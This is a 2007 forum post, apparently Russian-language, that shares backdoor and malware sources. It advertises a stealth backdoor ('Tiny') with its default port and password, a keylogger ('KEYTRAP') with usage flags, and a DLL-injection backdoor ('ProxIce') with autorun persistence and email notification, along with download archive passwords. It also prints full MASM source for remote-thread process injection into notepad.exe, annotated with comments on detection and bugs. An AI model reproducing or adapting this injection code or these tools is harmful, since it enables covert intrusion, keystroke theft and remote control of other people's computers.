
Isis 23.09.2007 00:17

[ASM] BackDoors' sources
 
Tiny v3.2

Цитата:

Tiny is a small backdoor which installs itself in stealth and can be removed again by connecting to it and choosing the correct option from the menu.

Connect to Tiny using netcat since Tiny won't allow you to enter the password using telnet.

Default port is: 63714
Password: Tiny
Download Tiny
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]

[masm] fwb+ example

Код:

Function injection (FWB+) example by shapeless
   
    - http://swerat.com
    - http://chasenet.org
   
    thanks to ksv for the Inject-code :)

^

.386

.model flat, stdcall
option casemap: none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\masm32.inc

includelib \masm32\lib\masm32.lib
includelib \masm32\lib\kernel32.lib

; FuncSize L1, L2 -- intended to leave eax = L2 - L1, i.e. the byte length
; of the code emitted between two labels. Used in __ep to measure
; remotefunc before it is copied elsewhere. It only measures bytes; it
; carries no relocation information, so whatever is bracketed must not
; depend on its own load address.
FuncSize MACRO L1, L2
        mov eax,L2
        sub eax,L1
    ENDM

; Parameter block handed to remotefunc. The whole struct is copied byte for
; byte into the target process (see the second Inject call in __ep), so it
; carries raw function pointers and inline string storage rather than
; pointers into this module's .data, which would be meaningless there.
TInjData struc
    GetAddr        dword ?      ; address of GetProcAddress, filled in by __ep
    LoadLib        dword ?      ; address of LoadLibraryA, filled in by __ep
    szUser32    byte 16 dup(0)  ; "user32.dll" copied in by lstrcpy; 16-byte field, no length check
    szMsgBox    byte 32 dup(0)  ; "MessageBoxA" copied in by lstrcpy; 32-byte field, no length check
TInjData ends

.data
; Constant strings used in this process only. The two the remote side needs
; are copied into InjData by value rather than referenced by pointer.
szApp                db "notepad.exe",0        ; host process spawned by CreateProcess in __ep
szUsr32            db "user32.dll",0           ; copied into InjData.szUser32
szKrnl32            db "kernel32.dll",0        ; module whose exports are resolved below
szMsgbox            db "MessageBoxA",0         ; copied into InjData.szMsgBox
szLoadLib        db "LoadLibraryA",0           ; export name resolved into InjData.LoadLib
szGetProcAddr db "GetProcAddress",0            ; export name resolved into InjData.GetAddr

.data?
SInfo                STARTUPINFO <>            ; zeroed by RtlZeroMemory in __ep; cb is never set
PInfo                PROCESS_INFORMATION <>    ; receives the spawned host's handles/ids
InjData            TInjData <>                 ; local template that is copied into the host
pFunc                dword ?                   ; remote address of the remotefunc copy
dwThreadID    dword ?                          ; id of the remote thread; not used afterwards
hKernel            dword ?                     ; module handle of kernel32.dll in this process

.code

; Thanks to ksv for c++ example of this code :)
;-----------------------------------------------------------------------
; void* Inject(HANDLE hProcess, DWORD dwSize, void *Code)
; ABI:   stdcall MASM proc; esi is saved/restored by 'uses esi'
; In:    hProcess = handle to the target process
;        dwSize   = number of bytes to copy
;        Code     = local buffer (code or data) to copy
; Out:   eax = address of the copy inside the target, or 0 on failure
;        (each early 'ret' leaves the failing API's 0 return in eax)
; Note:  __ep tests ZF with 'jz' straight after invoking this proc. That
;        only holds because the last flag-setting instruction on every
;        path is the '.if eax==0' compare and the trailing mov plus the
;        MASM-generated epilogue do not touch flags -- a fragile convention.
; Detection: VirtualAllocEx with PAGE_EXECUTE_READWRITE followed by
;        WriteProcessMemory into another process is the canonical
;        remote-injection sequence that EDR/ETW telemetry keys on; the
;        RWX permission is the strongest single indicator in this proc.
;-----------------------------------------------------------------------
Inject proc uses esi hProcess:dword,dwSize:dword,Code:dword
LOCAL dwOldProtect:dword        ; previous protection from VirtualProtectEx; never read
LOCAL dwWritten:dword           ; bytes actually written; never compared against dwSize

    ; reserve+commit an RWX region of dwSize bytes inside the target
    invoke VirtualAllocEx,hProcess,0,dwSize,MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE
    .if eax==0
        ret
    .endif
    mov esi,eax                 ; esi = remote base address

    ; redundant: the region was already allocated PAGE_EXECUTE_READWRITE above
    invoke VirtualProtectEx,hProcess,esi,dwSize,PAGE_EXECUTE_READWRITE,addr dwOldProtect
    .if eax==0
        ret
    .endif
   
    ; copy the local buffer into the remote region
    invoke WriteProcessMemory,hProcess,esi,Code,dwSize,addr dwWritten
    .if eax==0
        ret
    .endif
   
    mov eax,esi                 ; success: return the remote address
   
    ret

Inject endp


; Label1/Label2 bracket remotefunc so FuncSize can compute its byte length.
; This assumes the assembler emits the whole proc contiguously between them.
Label1:

;-----------------------------------------------------------------------
; DWORD WINAPI remotefunc(TInjData *iData)
; Executes inside the target process as the start routine of the thread
; created by CreateRemoteThread; iData is the thread parameter, i.e. the
; remote copy of InjData. The body touches memory only through esi and
; the stack frame, so the raw bytes behave the same at whatever address
; Inject placed them.
; Equivalent C:
;   h = LoadLibraryA(iData->szUser32);
;   f = GetProcAddress(h, iData->szMsgBox);
;   f(0,0,0,0);                      // MessageBoxA(0,0,0,0)
; Note: neither the LoadLibraryA nor the GetProcAddress result is checked;
;       a NULL from either is passed straight into the next call.
; Detection: a thread whose start address lies in a private RWX region not
;       backed by any module is a standard hunting heuristic for this.
;-----------------------------------------------------------------------
remotefunc PROC uses esi iData:DWORD
; Code:
; invoke Loadlibrary,szUser32
; invoke GetProcAddres,hUser32,szMessagebox
; invoke Messagebox,0,0,0,0

    mov esi,iData               ; esi = remote TInjData
    assume esi:ptr TInjData

    lea ecx,[esi].szUser32
    push ecx                    ; lpLibFileName
    call [esi].LoadLib          ; eax = LoadLibraryA("user32.dll")
   
    lea ecx,[esi].szMsgBox
    push ecx                    ; lpProcName (stdcall: pushed right-to-left)
    push eax                    ; hModule
    call [esi].GetAddr          ; eax = GetProcAddress(hModule, "MessageBoxA")
   
    push 0
    push 0
    push 0
    push 0
    call eax                    ; MessageBoxA(0,0,0,0)
   
    assume esi:nothing
   
    ret                         ; returning from the start routine ends the remote thread
remotefunc endp

Label2:

;-----------------------------------------------------------------------
; Program entry point. Spawns a host process, fills InjData with the
; addresses and strings remotefunc needs, copies both remotefunc and
; InjData into the host, then starts a remote thread at the copied code.
; Detection: CreateProcess -> VirtualAllocEx(RWX) -> WriteProcessMemory
;   -> CreateRemoteThread from a just-created parent is the classic
;   injection chain; parent/child lineage plus a thread start address in
;   unbacked RWX memory give defenders several correlation points.
;-----------------------------------------------------------------------
__ep:
; create new process
; NOTE: SInfo.cb stays 0 after RtlZeroMemory (never set to SizeOf STARTUPINFO),
; the CreateProcess return value is not checked (PInfo.hProcess may be 0
; below), and the handles placed in PInfo are never closed. The host is
; started running (flags 0, no CREATE_SUSPENDED) while injection proceeds.
invoke RtlZeroMemory,addr SInfo,SizeOf STARTUPINFO
invoke CreateProcess,0,addr szApp,0,0,FALSE,0,0,0,addr SInfo,addr PInfo

; prep the structure
; Strings are copied into the struct body rather than pointed to, because
; the struct is later copied into the host where this module's .data is absent.
invoke lstrcpy,addr InjData.szUser32,addr szUsr32
invoke lstrcpy,addr InjData.szMsgBox,addr szMsgbox

; The two addresses are resolved in THIS process and used in the host
; unchanged; presumably relies on kernel32.dll having the same base in
; both processes -- nothing in the code verifies that.
invoke GetModuleHandle,addr szKrnl32
mov hKernel,eax

invoke GetProcAddress,hKernel,addr szLoadLib
mov InjData.LoadLib,eax

invoke GetProcAddress,hKernel,addr szGetProcAddr
mov InjData.GetAddr,eax


; inject function
; eax = byte length of remotefunc (Label2 - Label1), passed as dwSize.
; 'jz' relies on ZF still reflecting Inject's final '.if eax==0' compare
; (Inject's epilogue does not touch flags) -- fragile, see Inject's header.
FuncSize Label1,Label2
invoke Inject,PInfo.hProcess,eax,offset remotefunc
jz EOF
mov pFunc,eax               ; pFunc = remote address of the function copy

; inject the structure
invoke Inject,PInfo.hProcess,sizeof TInjData,offset InjData
jz EOF                      ; on success eax = remote address of the struct copy

; start remotefunc in the host with the remote struct as its parameter;
; the returned thread handle is discarded (never closed or waited on)
invoke CreateRemoteThread,PInfo.hProcess,0,0,pFunc,eax,0,addr dwThreadID

EOF:

invoke ExitProcess,0
end __ep


KEYTRAP

Цитата:

KEYTRAP v1.0 - Keyboard Key Logger
By Dcypher (Dcypher@aol.com)

Usage: KEYTRAP <dir\logfile> /A /B /C

A - Maximum size of log file.
B - Number of keys to log per session.
C - Minutes between each session.
Download Keytrap
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]


ProxIce 2.0 - backdoor DLL injection

Цитата:

First of all, thank you for using this program

Written in 100% pure ASM, with MASM & WinASM.

Functions:
- Injection of a thread which itself loads the infectious DLL
- Encoding of the data inside the server
- Password not deciphered in memory
- Notification by email
- EditServer
- Installation of the BDR in a single key for autorun
- Test of connection
- Backdoor on the port of your choice
- Fully commented sources

This program was designed and written for mag #1 of n0name; thanks to Aphex
for the injection technique, and that is all. Thanks to bleyme for having cast
an eye over my sources, and thanks in fact to the whole n0name TEAM for being
what it is. This backdoor is proof that one can quickly make a backdoor that is
simple, effective and fairly stealthy at a very small size. The sources are for
educational purposes and will allow those who wish to learn a little while
understanding why and what is done.

You will need NetCat, delivered with the pack, to connect to the server.
Note that this backdoor is designed for XP/NT.

Have fun

Download ProxIce
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]

